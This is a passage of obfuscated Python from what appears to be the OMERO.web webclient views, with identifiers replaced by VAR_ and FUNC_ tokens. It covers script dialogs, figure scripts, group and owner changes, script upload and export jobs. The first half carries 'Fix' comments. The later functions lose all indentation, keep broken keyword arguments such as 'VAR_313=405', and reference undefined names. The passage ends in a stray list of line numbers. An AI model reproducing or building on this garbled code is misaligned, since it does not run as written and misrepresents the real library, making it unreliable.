        # NOTE(review): 'ex.message' is Python-2 era; kept as-is since the
        # surrounding file relies on it elsewhere — confirm on upgrade.
        if ex.message.lower().startswith("no processor available"):
            return {
                "template": "webclient/VAR_203/no_processor.html",
                "scriptId": VAR_42,
            }
        raise ex
    if VAR_73 is None:
        return HttpResponse()
    VAR_208 = {}
    VAR_208["id"] = VAR_241(VAR_42)
    VAR_208["name"] = VAR_73.name.replace("_", " ")
    VAR_208["description"] = VAR_73.description
    VAR_208["authors"] = ", ".join([a for a in VAR_73.authors])
    VAR_208["contact"] = VAR_73.contact
    VAR_208["version"] = VAR_73.version
    VAR_208["institutions"] = ", ".join([VAR_318 for VAR_318 in VAR_73.institutions])
    VAR_209 = []  # use a list so we can sort by 'grouping'
    VAR_210 = None
    VAR_211 = None
    for VAR_310, VAR_320 in VAR_73.inputs.items():
        VAR_318 = {}
        VAR_318["name"] = VAR_310.replace("_", " ")
        VAR_318["key"] = VAR_310
        if not VAR_320.optional:
            VAR_318["required"] = True
        VAR_318["description"] = VAR_320.description
        if VAR_320.min:
            VAR_318["min"] = VAR_345(VAR_320.min.getValue())
        if VAR_320.max:
            VAR_318["max"] = VAR_345(VAR_320.max.getValue())
        if VAR_320.values:
            VAR_318["options"] = [VAR_414.getValue() for VAR_414 in VAR_320.values.getValue()]
        if VAR_320.useDefault:
            VAR_318["default"] = unwrap(VAR_320.prototype)
            if isinstance(VAR_318["default"], omero.model.IObject):
                VAR_318["default"] = None
        VAR_319 = unwrap(VAR_320.prototype)
        if VAR_319.__class__.__name__ == "dict":
            VAR_318["map"] = True
        elif VAR_319.__class__.__name__ == "list":
            VAR_318["list"] = True
            if "default" in VAR_318:
                VAR_318["default"] = ",".join([VAR_345(VAR_362) for VAR_362 in VAR_318["default"]])
        elif isinstance(VAR_319, bool):
            VAR_318["boolean"] = True
        elif isinstance(VAR_319, int) or isinstance(VAR_319, VAR_241):
            VAR_318["number"] = "number"
        elif isinstance(VAR_319, float):
            VAR_318["number"] = "float"
        if VAR_2.GET.get(VAR_310, None) is not None:
            VAR_318["default"] = VAR_2.GET.get(VAR_310, None)
        VAR_318["prototype"] = unwrap(VAR_320.prototype)
        VAR_318["grouping"] = VAR_320.grouping
        VAR_209.append(VAR_318)
        if VAR_310 == "IDs":
            VAR_211 = VAR_318  # remember these...
        if VAR_310 == "Data_Type":
            VAR_210 = VAR_318
    # Fix: list.sort only accepts 'key'/'reverse' keyword arguments; the
    # obfuscated keyword raised TypeError.
    VAR_209.sort(key=lambda VAR_318: VAR_318["grouping"])
    if (
        VAR_210 is not None
        and VAR_211 is not None
        and "options" in VAR_210
    ):
        VAR_211["default"] = ""
        for VAR_215 in VAR_210["options"]:
            if VAR_2.GET.get(VAR_215, None) is not None:
                VAR_210["default"] = VAR_215
                VAR_211["default"] = VAR_2.GET.get(VAR_215, "")
                break  # only use the first match
        if len(VAR_211["default"]) == 0 and VAR_2.GET.get("Well", None) is not None:
            if "Image" in VAR_210["options"]:
                VAR_214 = [VAR_241(j) for j in VAR_2.GET.get("Well", None).split(",")]
                VAR_322 = 0
                try:
                    VAR_322 = int(VAR_2.GET.get("Index", 0))
                except Exception:
                    pass
                VAR_113 = VAR_6.getObjects("Well", VAR_214)
                VAR_304 = [VAR_345(w.getImage(VAR_322).getId()) for w in VAR_113]
                VAR_210["default"] = "Image"
                VAR_211["default"] = ",".join(VAR_304)
    # Group inputs: '03.1' style groupings become children of group '03'.
    for VAR_318 in range(len(VAR_209)):
        if len(VAR_209) <= VAR_318:
            break
        VAR_320 = VAR_209[VAR_318]
        VAR_321 = VAR_320["grouping"]  # E.g 03
        VAR_320["children"] = list()
        while len(VAR_209) > VAR_318 + 1:
            VAR_368 = VAR_209[VAR_318 + 1]["grouping"]  # E.g. 03.1
            if VAR_368.split(".")[0] == VAR_321:
                VAR_320["children"].append(VAR_209[VAR_318 + 1])
                VAR_209.pop(VAR_318 + 1)
            else:
                break
    VAR_208["inputs"] = VAR_209
    return {
        "template": "webclient/VAR_203/FUNC_68.html",
        "paramData": VAR_208,
        "scriptId": VAR_42,
    }
@login_required()
@render_response()
def FUNC_69(VAR_2, VAR_43, VAR_6=None, **VAR_7):
    """Prepare dialog context for a figure script.

    VAR_43 selects the script: 'SplitView', 'Thumbnail' or 'MakeMovie'.
    Target images come from ?Image=, ?Dataset= or ?Well= GET params.
    """
    VAR_212 = VAR_2.GET.get("Image", None)  # comma - delimited list
    VAR_213 = VAR_2.GET.get("Dataset", None)
    VAR_214 = VAR_2.GET.get("Well", None)
    if VAR_214 is not None:
        VAR_214 = [VAR_241(VAR_318) for VAR_318 in VAR_214.split(",")]
        VAR_113 = VAR_6.getObjects("Well", VAR_214)
        VAR_322 = getIntOrDefault(VAR_2, "Index", 0)
        VAR_212 = [VAR_345(w.getImage(VAR_322).getId()) for w in VAR_113]
        VAR_212 = ",".join(VAR_212)
    if VAR_212 is None and VAR_213 is None:
        return HttpResponse(
            "Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
        )

    def FUNC_86(VAR_215, VAR_187):
        # Validate ids, load the objects and set the group context.
        VAR_323 = [int(VAR_40) for VAR_40 in VAR_187.split(",")]
        VAR_324 = {}
        for VAR_38 in VAR_6.getObjects(VAR_215, VAR_323):
            VAR_324[VAR_38.id] = VAR_38
        VAR_325 = [VAR_41 for VAR_41 in VAR_323 if VAR_41 in VAR_324.keys()]
        if len(VAR_325) == 0:
            raise Http404("No %ss found with IDs %s" % (VAR_215, VAR_187))
        else:
            VAR_335 = list(VAR_324.values())[0].getDetails().group.id.val
            VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_335)
        return VAR_325, VAR_324

    VAR_53 = {}
    if VAR_212 is not None:
        VAR_212, VAR_326 = FUNC_86("Image", VAR_212)
        VAR_53["idString"] = ",".join([VAR_345(VAR_318) for VAR_318 in VAR_212])
        VAR_53["dtype"] = "Image"
    if VAR_213 is not None:
        VAR_213, VAR_327 = FUNC_86("Dataset", VAR_213)
        VAR_53["idString"] = ",".join([VAR_345(VAR_318) for VAR_318 in VAR_213])
        VAR_53["dtype"] = "Dataset"
    if VAR_43 == "SplitView":
        VAR_328 = "/omero/figure_scripts/Split_View_Figure.py"
        VAR_54 = "webclient/VAR_203/split_view_figure.html"
        VAR_329 = []  # info dict per image
        for VAR_430 in VAR_212:
            VAR_158 = {"id": VAR_430}
            VAR_369 = VAR_326[VAR_430]
            VAR_158["name"] = VAR_369.getName()
            VAR_164 = [
                VAR_180.getTextValue()
                for VAR_180 in VAR_369.listAnnotations()
                if VAR_180._obj.__class__ == omero.model.TagAnnotationI
            ]
            VAR_158["tags"] = VAR_164
            VAR_158["datasets"] = [VAR_362.getName() for VAR_362 in VAR_369.listParents()]
            VAR_329.append(VAR_158)
        VAR_142 = VAR_326[VAR_212[0]]
        VAR_53["imgDict"] = VAR_329
        VAR_53["image"] = VAR_142
        VAR_53["channels"] = VAR_142.getChannels()
    elif VAR_43 == "Thumbnail":
        VAR_328 = "/omero/figure_scripts/Thumbnail_Figure.py"
        VAR_54 = "webclient/VAR_203/thumbnail_figure.html"

        def FUNC_89(VAR_212):
            # Map image ids to their tag annotations in a single query.
            VAR_406 = VAR_6.getAnnotationLinks("Image", parent_ids=VAR_212)
            VAR_407 = {}  # {image_id: [tags]}
            VAR_408 = {}
            for VAR_430 in VAR_212:
                VAR_407[VAR_430] = []
            for VAR_344 in VAR_406:
                VAR_382 = VAR_344.getChild()
                if VAR_382._obj.__class__ == omero.model.TagAnnotationI:
                    VAR_408[VAR_382.id] = VAR_382
                    VAR_407[VAR_344.getParent().id].append(VAR_382)
            VAR_409 = []
            for VAR_430 in VAR_212:
                VAR_409.append({"id": VAR_430, "tags": VAR_407[VAR_430]})
            VAR_164 = []
            for tId, VAR_431 in VAR_408.items():
                VAR_164.append(VAR_431)
            return VAR_409, VAR_164

        VAR_370 = []  # multiple collections of images
        VAR_164 = []
        VAR_371 = "Thumbnail_Figure"
        if VAR_213 is not None:
            for VAR_362 in VAR_6.getObjects("Dataset", VAR_213):
                VAR_304 = [VAR_318.id for VAR_318 in VAR_362.listChildren()]
                VAR_409, VAR_410 = FUNC_89(VAR_304)
                VAR_370.append({"name": VAR_362.getName(), "imageTags": VAR_409})
                VAR_164.extend(VAR_410)
            VAR_371 = VAR_370[0]["name"]
        else:
            VAR_409, VAR_410 = FUNC_89(VAR_212)
            VAR_370.append({"name": "images", "imageTags": VAR_409})
            VAR_164.extend(VAR_410)
            VAR_411 = VAR_6.getObject("Image", VAR_212[0]).getParent()
            VAR_371 = VAR_411.getName() or "Thumbnail Figure"
            VAR_53["parent_id"] = VAR_411.getId()
        VAR_372 = set()  # remove duplicates
        VAR_373 = []
        for VAR_431 in VAR_164:
            if VAR_431.id not in VAR_372:
                VAR_373.append(VAR_431)
                VAR_372.add(VAR_431.id)
        # Fix: list.sort only accepts 'key'/'reverse' keyword arguments.
        VAR_373.sort(key=lambda x: x.getTextValue().lower())
        VAR_53["thumbSets"] = VAR_370
        VAR_53["tags"] = VAR_373
        VAR_53["figureName"] = VAR_371.replace(" ", "_")
    elif VAR_43 == "MakeMovie":
        VAR_328 = "/omero/export_scripts/Make_Movie.py"
        VAR_54 = "webclient/VAR_203/make_movie.html"
        VAR_142 = VAR_6.getObject("Image", VAR_212[0])
        VAR_412 = VAR_142.getName().rsplit(".", 1)
        # Keep a short (<=3 char) extension, otherwise drop it.
        if len(VAR_412) > 1 and len(VAR_412[1]) > 3:
            VAR_412 = ".".join(VAR_412)
        else:
            # Fix: previously referenced undefined name 'movieName'.
            VAR_412 = VAR_412[0]
        VAR_53["movieName"] = os.path.basename(VAR_412)
        VAR_282 = []
        for VAR_382 in VAR_142.getChannels():
            VAR_282.append(
                {
                    "active": VAR_382.isActive(),
                    "color": VAR_382.getColor().getHtml(),
                    "label": VAR_382.getLabel(),
                }
            )
        VAR_53["channels"] = VAR_282
        VAR_53["sizeT"] = VAR_142.getSizeT()
        VAR_53["sizeZ"] = VAR_142.getSizeZ()
    VAR_202 = VAR_6.getScriptService()
    VAR_42 = VAR_202.getScriptID(VAR_328)
    if VAR_42 < 0:
        raise AttributeError("No script found for VAR_314 '%s'" % VAR_328)
    VAR_53["template"] = VAR_54
    VAR_53["scriptId"] = VAR_42
    return VAR_53
@login_required()
@render_response()
def FUNC_70(VAR_2, VAR_27, VAR_6=None, **VAR_7):
    """List filesets that would be split by the requested action (move/delete)."""
    selected = {}
    for obj_type in ("Image", "Dataset", "Project"):
        raw_ids = VAR_2.GET.get(obj_type, None)
        if raw_ids is not None:
            selected[obj_type] = [int(part) for part in raw_ids.split(",")]
    by_fileset = VAR_6.getContainerService().getImagesBySplitFilesets(
        selected, None, VAR_6.SERVICE_OPTS
    )
    split_info = [
        {
            "id": fs_id,
            "attempted_iids": split_map[True],
            "blocking_iids": split_map[False],
        }
        for fs_id, split_map in by_fileset.items()
    ]
    context = {"split_filesets": split_info}
    context["action"] = VAR_27
    if VAR_27 == "chgrp":
        context["action"] = "move"
    context["template"] = "webclient/FUNC_63/fileset_check_dialog_content.html"
    return context
def FUNC_71(
    VAR_6, VAR_44, VAR_45, VAR_46, VAR_47, VAR_48, VAR_11
):
    """Work out which tree nodes to remove/refresh after a chgrp move.

    Expands the moved Projects/Screens down to Datasets/Plates/Images (and
    sibling images sharing a fileset), then finds Datasets/Projects left
    childless by the move. Returns {'remove': {...}, 'childless': {...}}.
    NOTE(review): VAR_11 (the user id) is currently unused here.
    """
    VAR_73 = omero.sys.ParametersI()
    VAR_74 = VAR_6.getQueryService()
    VAR_44 = set(VAR_44)
    VAR_45 = set(VAR_45)
    VAR_46 = set(VAR_46)
    VAR_219 = set([])
    VAR_48 = set(VAR_48)
    VAR_47 = set(VAR_47)
    if VAR_44:
        # Datasets under the moved Projects.
        VAR_73.map = {}
        VAR_73.map["pids"] = rlist([rlong(x) for x in list(VAR_44)])
        VAR_75 = """
            select pdlink.child.id
            from ProjectDatasetLink pdlink
            where pdlink.parent.id in (:pids)
            """
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_45.add(e[0].val)
    if VAR_47:
        # Plates under the moved Screens.
        VAR_73.map = {}
        VAR_73.map["sids"] = rlist([rlong(x) for x in VAR_47])
        VAR_75 = """
            select splink.child.id
            from ScreenPlateLink splink
            where splink.parent.id in (:sids)
            """
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_48.add(e[0].val)
    if VAR_45:
        # Images (and their fileset ids) under the moved Datasets.
        VAR_73.map = {}
        VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
        VAR_75 = """
            select dilink.child.id,
                   dilink.child.fileset.id
            from DatasetImageLink dilink
            where dilink.parent.id in (:dids)
            """
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_46.add(e[0].val)
            if e[1] is not None:
                VAR_219.add(e[1].val)
    if VAR_48:
        # Images under the moved Plates.
        VAR_73.map = {}
        VAR_73.map["plids"] = rlist([rlong(x) for x in VAR_48])
        VAR_75 = """
            select ws.image.id
            from WellSample ws
            join ws.plateAcquisition pa
            where pa.plate.id in (:plids)
            """
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_46.add(e[0].val)
    if VAR_219:
        # Sibling images that share a multi-image fileset also move.
        VAR_73.map = {}
        VAR_73.map["fsids"] = rlist([rlong(x) for x in VAR_219])
        # Fix: the obfuscation corrupted the HQL keyword 'group by'.
        VAR_75 = """
            select VAR_142.id
            from Image VAR_142
            left outer join VAR_142.datasetLinks dilink
            where VAR_142.fileset.id in (select VAR_364.id
                from Image im
                join im.fileset VAR_364
                where VAR_364.id in (:fsids)
                group by VAR_364.id
                having count(im.id)>1)
            """
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_46.add(e[0].val)
    VAR_220 = set([])
    VAR_221 = False
    if VAR_46:
        VAR_73.map = {
            "iids": rlist([rlong(x) for x in VAR_46]),
        }
        VAR_330 = ""
        if VAR_45:
            VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
            VAR_330 = """
                and (
                    dilink.parent.id not in (:dids)
                    or dilink.parent.id = null
                )
                """
        # Fix: placeholder must match the 'iids' key set in the parameter
        # map above (was an obfuscation artifact).
        VAR_75 = (
            """
            select distinct dilink.parent.id
            from Image VAR_142
            left outer join VAR_142.datasetLinks dilink
            where VAR_142.id in (:iids)
            %s
            and (select count(dilink2.child.id)
                from DatasetImageLink dilink2
                where dilink2.parent.id = dilink.parent.id
                and dilink2.child.id not in (:iids)) = 0
            """
            % VAR_330
        )
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            if e:
                VAR_220.add(e[0].val)
            else:
                VAR_221 = True
    VAR_222 = set([])
    if VAR_45:
        VAR_73.map = {"dids": rlist([rlong(x) for x in VAR_45])}
        VAR_331 = ""
        if VAR_44:
            VAR_73.map["pids"] = rlist([rlong(x) for x in VAR_44])
            VAR_331 = "and pdlink.parent.id not in (:pids)"
        VAR_75 = (
            """
            select distinct pdlink.parent.id
            from ProjectDatasetLink pdlink
            where pdlink.child.id in (:dids)
            %s
            and (select count(pdlink2.child.id)
                from ProjectDatasetLink pdlink2
                where pdlink2.parent.id = pdlink.parent.id
                and pdlink2.child.id not in (:dids)) = 0
            """
            % VAR_331
        )
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_222.add(e[0].val)
    VAR_223 = {
        "remove": {
            "project": list(VAR_44),
            "dataset": list(VAR_45),
            "screen": list(VAR_47),
            "plate": list(VAR_48),
            "image": list(VAR_46),
        },
        "childless": {
            "project": list(VAR_222),
            "dataset": list(VAR_220),
            "orphaned": VAR_221,
        },
    }
    return VAR_223
@require_POST
@login_required()
def FUNC_72(VAR_2, VAR_6=None, **VAR_7):
    """Dry-run wrapper: delegate to FUNC_73 with the 'chgrp' action."""
    # Fix: previously passed undefined name 'conn'; forward the injected
    # connection local instead.
    return FUNC_73(VAR_2, VAR_27="chgrp", VAR_6=VAR_6, **VAR_7)
@require_POST
@login_required()
def FUNC_73(VAR_2, VAR_27, VAR_6=None, **VAR_7):
    """Submit a dry-run of a chgrp/chown on the POSTed objects.

    Returns the dry-run handle as a plain-text response so the client can
    poll it via the activities endpoint.
    """
    targets = {}
    for obj_type in ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]:
        raw_ids = VAR_2.POST.get(obj_type, None)
        if raw_ids is None:
            continue
        targets[obj_type] = [int(one_id) for one_id in raw_ids.split(",")]
    if VAR_27 == "chgrp":
        target_id = getIntOrDefault(VAR_2, "group_id", None)
    elif VAR_27 == "chown":
        target_id = getIntOrDefault(VAR_2, "owner_id", None)
    handle = VAR_6.submitDryRun(VAR_27, targets, target_id)
    return HttpResponse(VAR_345(handle))
@login_required()
def FUNC_74(VAR_2, VAR_6=None, **VAR_7):
    """Move the POSTed objects into another group (chgrp).

    Registers one session callback per object type so the activities panel
    can poll progress, then returns the tree-update info from FUNC_71.
    """
    if not VAR_2.method == "POST":
        # Fix: JsonResponse takes 'status', not an arbitrary keyword.
        return JsonResponse({"Error": "Need to POST to chgrp"}, status=405)
    VAR_20 = getIntOrDefault(VAR_2, "group_id", None)
    if VAR_20 is None:
        return JsonResponse({"Error": "chgrp: No VAR_20 specified"})
    VAR_20 = VAR_241(VAR_20)

    def FUNC_87(VAR_71):
        # Owner of the first POSTed object: the move is performed as them.
        for VAR_431 in ["Dataset", "Image", "Plate"]:
            VAR_187 = VAR_71.POST.get(VAR_431, None)
            if VAR_187 is not None:
                for o in list(VAR_6.getObjects(VAR_431, VAR_187.split(","))):
                    return o.getDetails().owner.id.val

    VAR_101 = VAR_6.getObject("ExperimenterGroup", VAR_20)
    VAR_226 = VAR_2.POST.get("new_container_name", None)
    VAR_227 = VAR_2.POST.get("new_container_type", None)
    VAR_228 = None
    VAR_229 = FUNC_87(VAR_2)
    VAR_6.SERVICE_OPTS.setOmeroUser(VAR_229)
    if (
        VAR_226 is not None
        and len(VAR_226) > 0
        and VAR_227 is not None
    ):
        VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_20)
        VAR_228 = VAR_6.createContainer(VAR_227, VAR_226)
    if VAR_228 is None:
        VAR_332 = VAR_2.POST.get("target_id", None)
        VAR_228 = VAR_332 is not None and VAR_332.split("-")[1] or None
    VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
    for VAR_215 in VAR_225:
        VAR_154 = VAR_2.POST.get(VAR_215, None)
        if VAR_154 is not None:
            VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
            VAR_305 = VAR_2.POST.getlist("fileset")
            if len(VAR_305) > 0:
                if VAR_215 == "Dataset":
                    # Fix: previously passed undefined name 'fsIds'.
                    VAR_6.regroupFilesets(dsIds=VAR_144, VAR_305=VAR_305)
                else:
                    for VAR_364 in VAR_6.getObjects("Fileset", VAR_305):
                        VAR_144.extend([VAR_318.id for VAR_318 in VAR_364.copyImages()])
                    VAR_144 = list(set(VAR_144))  # remove duplicates
            VAR_0.debug("chgrp to VAR_101:%s %s-%s" % (VAR_20, VAR_215, VAR_144))
            VAR_84 = VAR_6.chgrpObjects(VAR_215, VAR_144, VAR_20, VAR_228)
            VAR_198 = VAR_345(VAR_84)
            VAR_2.session["callback"][VAR_198] = {
                "job_type": "chgrp",
                "group": VAR_101.getName(),
                "to_group_id": VAR_20,
                "dtype": VAR_215,
                "obj_ids": VAR_144,
                "job_name": "Change group",
                "start_time": datetime.datetime.now(),
                "status": "in progress",
            }
            VAR_2.session.modified = True
    VAR_44 = VAR_2.POST.get("Project", [])
    VAR_45 = VAR_2.POST.get("Dataset", [])
    VAR_46 = VAR_2.POST.get("Image", [])
    VAR_47 = VAR_2.POST.get("Screen", [])
    VAR_48 = VAR_2.POST.get("Plate", [])
    # Fix: the parsed id lists were previously assigned to unused names, so
    # FUNC_71 received raw comma-strings; assign back to the locals.
    if VAR_44:
        VAR_44 = [VAR_241(x) for x in VAR_44.split(",")]
    if VAR_45:
        VAR_45 = [VAR_241(x) for x in VAR_45.split(",")]
    if VAR_46:
        VAR_46 = [VAR_241(x) for x in VAR_46.split(",")]
    if VAR_47:
        VAR_47 = [VAR_241(x) for x in VAR_47.split(",")]
    if VAR_48:
        VAR_48 = [VAR_241(x) for x in VAR_48.split(",")]
    VAR_230 = FUNC_71(
        VAR_6,
        VAR_44,
        VAR_45,
        VAR_46,
        VAR_47,
        VAR_48,
        VAR_2.session.get("user_id"),
    )
    return JsonResponse({"update": VAR_230})
@login_required()
def FUNC_75(VAR_2, VAR_6=None, **VAR_7):
if not VAR_2.method == "POST":
return JsonResponse({"Error": "Need to POST to chown"}, VAR_313=405)
VAR_231 = getIntOrDefault(VAR_2, "owner_id", None)
if VAR_231 is None:
return JsonResponse({"Error": "chown: No VAR_231 specified"})
VAR_231 = int(VAR_231)
VAR_232 = VAR_6.getObject("Experimenter", VAR_231)
if VAR_232 is None:
return JsonResponse({"Error": "chown: Experimenter not found" % VAR_231})
VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
VAR_233 = []
for VAR_215 in VAR_225:
VAR_154 = VAR_2.POST.get(VAR_215, None)
if VAR_154 is not None:
VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
VAR_0.debug("chown to VAR_103:%s %s-%s" % (VAR_231, VAR_215, VAR_144))
VAR_84 = VAR_6.chownObjects(VAR_215, VAR_144, VAR_231)
VAR_198 = VAR_345(VAR_84)
VAR_233.append(VAR_198)
VAR_2.session["callback"][VAR_198] = {
"job_type": "chown",
"owner": VAR_232.getFullName(),
"to_owner_id": VAR_231,
"dtype": VAR_215,
"obj_ids": VAR_144,
"job_name": "Change owner",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
VAR_2.session.modified = True
return JsonResponse({"jobIds": VAR_233})
@login_required(setGroupContext=True)
def FUNC_76(VAR_2, VAR_42, VAR_6=None, **VAR_7):
VAR_202 = VAR_6.getScriptService()
VAR_50 = {}
VAR_49 = VAR_241(VAR_42)
try:
VAR_73 = VAR_202.getParams(VAR_49)
except Exception as x:
if x.message and x.message.startswith("No processor available"):
VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Script")
return JsonResponse(VAR_174)
else:
raise
VAR_73 = VAR_202.getParams(VAR_49)
VAR_43 = VAR_73.name.replace("_", " ").replace(".py", "")
VAR_0.debug("Script: run with VAR_2.POST: %s" % VAR_2.POST)
VAR_234 = (
"file_annotation" in VAR_2.FILES and VAR_2.FILES["file_annotation"] or None
)
VAR_235 = None
if VAR_234 is not None and VAR_234 != "":
VAR_104 = BaseContainer(VAR_6)
VAR_235 = VAR_104.createFileAnnotations(VAR_234, [])
for VAR_310, VAR_320 in VAR_73.inputs.items():
VAR_333 = VAR_320.prototype
VAR_334 = VAR_333.__class__
if VAR_310 == "File_Annotation" and VAR_235 is not None:
VAR_50[VAR_310] = VAR_334(VAR_345(VAR_235))
continue
if VAR_334 == omero.rtypes.RBoolI:
VAR_374 = VAR_310 in VAR_2.POST
VAR_50[VAR_310] = VAR_334(VAR_374)
continue
if VAR_334.__name__ == "RMapI":
VAR_375 = "%s_key0" % VAR_310
VAR_376 = "%s_value0" % VAR_310
VAR_377 = 0
VAR_378 = {}
while VAR_375 in VAR_2.POST:
VAR_413 = VAR_345(VAR_2.POST[VAR_375])
VAR_414 = VAR_2.POST[VAR_376]
if len(VAR_413) > 0 and len(VAR_414) > 0:
VAR_378[VAR_345(VAR_413)] = VAR_414
VAR_377 += 1
VAR_375 = "%s_key%d" % (VAR_310, VAR_377)
VAR_376 = "%s_value%d" % (VAR_310, VAR_377)
if len(VAR_378) > 0:
VAR_50[VAR_310] = wrap(VAR_378)
continue
if VAR_310 in VAR_2.POST:
if VAR_334 == omero.rtypes.RListI:
VAR_415 = VAR_2.POST.getlist(VAR_310)
if len(VAR_415) == 0:
continue
if len(VAR_415) == 1: # process comma-separated list
if len(VAR_415[0]) == 0:
continue
VAR_415 = values[0].split(",")
VAR_416 = omero.rtypes.RStringI
VAR_417 = VAR_333.val # list
if len(VAR_417) > 0:
VAR_416 = VAR_417[0].__class__
if VAR_416 == int(1).__class__:
VAR_416 = omero.rtypes.rint
if VAR_416 == VAR_241(1).__class__:
VAR_416 = omero.rtypes.rlong
VAR_418 = []
for VAR_414 in VAR_415:
try:
VAR_38 = VAR_416(VAR_414.strip())
except Exception:
VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_310, VAR_414))
continue
if isinstance(VAR_38, omero.model.IObject):
VAR_418.append(omero.rtypes.robject(VAR_38))
else:
VAR_418.append(VAR_38)
VAR_50[VAR_310] = omero.rtypes.rlist(VAR_418)
else:
VAR_374 = VAR_2.POST[VAR_310]
if len(VAR_374) == 0:
continue
try:
VAR_50[VAR_310] = VAR_334(VAR_374)
except Exception:
VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_310, VAR_374))
continue
if "IDs" in VAR_50 and "Data_Type" in VAR_50:
VAR_335 = VAR_6.SERVICE_OPTS.getOmeroGroup()
VAR_6.SERVICE_OPTS.setOmeroGroup("-1")
try:
VAR_379 = VAR_6.getObject(
VAR_50["Data_Type"].val, unwrap(VAR_50["IDs"])[0]
)
VAR_380 = VAR_379.getDetails().group.id.val
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_380)
except Exception:
VAR_0.debug(traceback.format_exc())
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_335)
try:
VAR_0.debug("Running script %s with " "params %s" % (VAR_43, VAR_50))
except Exception:
pass
VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43)
return JsonResponse(VAR_174)
@login_required(isAdmin=True)
@render_response()
def FUNC_77(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method != "POST":
return {"template": "webclient/VAR_203/upload_script.html"}
VAR_236 = VAR_2.POST.get("script_path")
VAR_237 = VAR_2.FILES["script_file"]
VAR_237.seek(0)
VAR_238 = VAR_237.read().decode("utf-8")
if not VAR_236.endswith("/"):
VAR_236 = script_path + "/"
VAR_236 = script_path + VAR_237.name
VAR_202 = VAR_6.getScriptService()
VAR_239 = VAR_202.getScriptID(VAR_236)
try:
if VAR_239 > 0:
VAR_173 = OriginalFileI(VAR_239, False)
VAR_202.editScript(VAR_173, VAR_238)
VAR_381 = "Script Replaced: %s" % VAR_237.name
else:
VAR_239 = VAR_202.uploadOfficialScript(VAR_236, VAR_238)
VAR_381 = "Script Uploaded: %s" % VAR_237.name
except omero.ValidationException as ex:
VAR_381 = VAR_345(ex)
return {"Message": VAR_381, "script_id": VAR_239}
@require_POST
@login_required()
def FUNC_78(VAR_2, VAR_26, VAR_6=None, **VAR_7):
VAR_202 = VAR_6.getScriptService()
VAR_49 = VAR_202.getScriptID("/omero/export_scripts/Batch_Image_Export.py")
VAR_142 = VAR_6.getObject("Image", VAR_26)
if VAR_142 is not None:
VAR_335 = VAR_142.getDetails().group.id.val
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_335)
VAR_212 = [VAR_241(VAR_26)]
VAR_50 = {
"Data_Type": wrap("Image"),
"IDs": rlist([rlong(id) for id in VAR_212]),
}
VAR_50["Format"] = wrap("OME-TIFF")
VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Create OME-TIFF")
return JsonResponse(VAR_174)
def FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Script"):
VAR_2.session.modified = True
VAR_202 = VAR_6.getScriptService()
try:
VAR_84 = VAR_202.runScript(VAR_49, VAR_50, None, VAR_6.SERVICE_OPTS)
VAR_198 = VAR_345(VAR_84)
VAR_313 = "in progress"
VAR_2.session["callback"][VAR_198] = {
"job_type": "script",
"job_name": VAR_43,
"start_time": datetime.datetime.now(),
"status": VAR_313,
}
VAR_2.session.modified = True
except Exception as x:
VAR_198 = VAR_345(time()) # E.g. 1312803670.6076391
VAR_381 = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
if VAR_381 and VAR_381.startswith("No processor available"):
VAR_0.info(traceback.format_exc())
VAR_57 = "No Processor Available"
VAR_313 = "no processor available"
VAR_381 = "" # VAR_54 displays VAR_381 and VAR_344
else:
VAR_0.error(traceback.format_exc())
VAR_57 = traceback.format_exc()
VAR_313 = "failed"
VAR_381 = x.message
VAR_2.session["callback"][VAR_198] = {
"job_type": "script",
"job_name": VAR_43,
"start_time": datetime.datetime.now(),
"status": VAR_313,
"Message": VAR_381,
"error": VAR_57,
}
return {"status": VAR_313, "error": VAR_57}
return {"jobId": VAR_198, "status": VAR_313}
@login_required()
@render_response()
def FUNC_80(VAR_2, VAR_26, VAR_6=None, **VAR_7):
VAR_240 = list(
VAR_6.getAnnotationLinks(
"Image", [VAR_26], VAR_90=omero.constants.namespaces.NSOMETIFF
)
)
VAR_172 = {}
if len(VAR_240) > 0:
VAR_240.sort(VAR_310=lambda x: x.getId(), VAR_350=True)
VAR_336 = VAR_240[0]
VAR_293 = VAR_336.creationEventDate()
VAR_34 = VAR_336.getChild().getId()
from omeroweb.webgateway.templatetags.common_filters import ago
VAR_31 = VAR_350("download_annotation", args=[VAR_34])
VAR_172 = {
"created": VAR_345(VAR_293),
"ago": ago(VAR_293),
"id": VAR_34,
"download": VAR_31,
}
return VAR_172 # will FUNC_81 returned as json by VAR_4
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
24,
38,
40,
43,
47,
49,
66,
67,
79,
84,
86,
90,
92,
107,
124,
126,
131,
133,
135,
136,
137,
139,
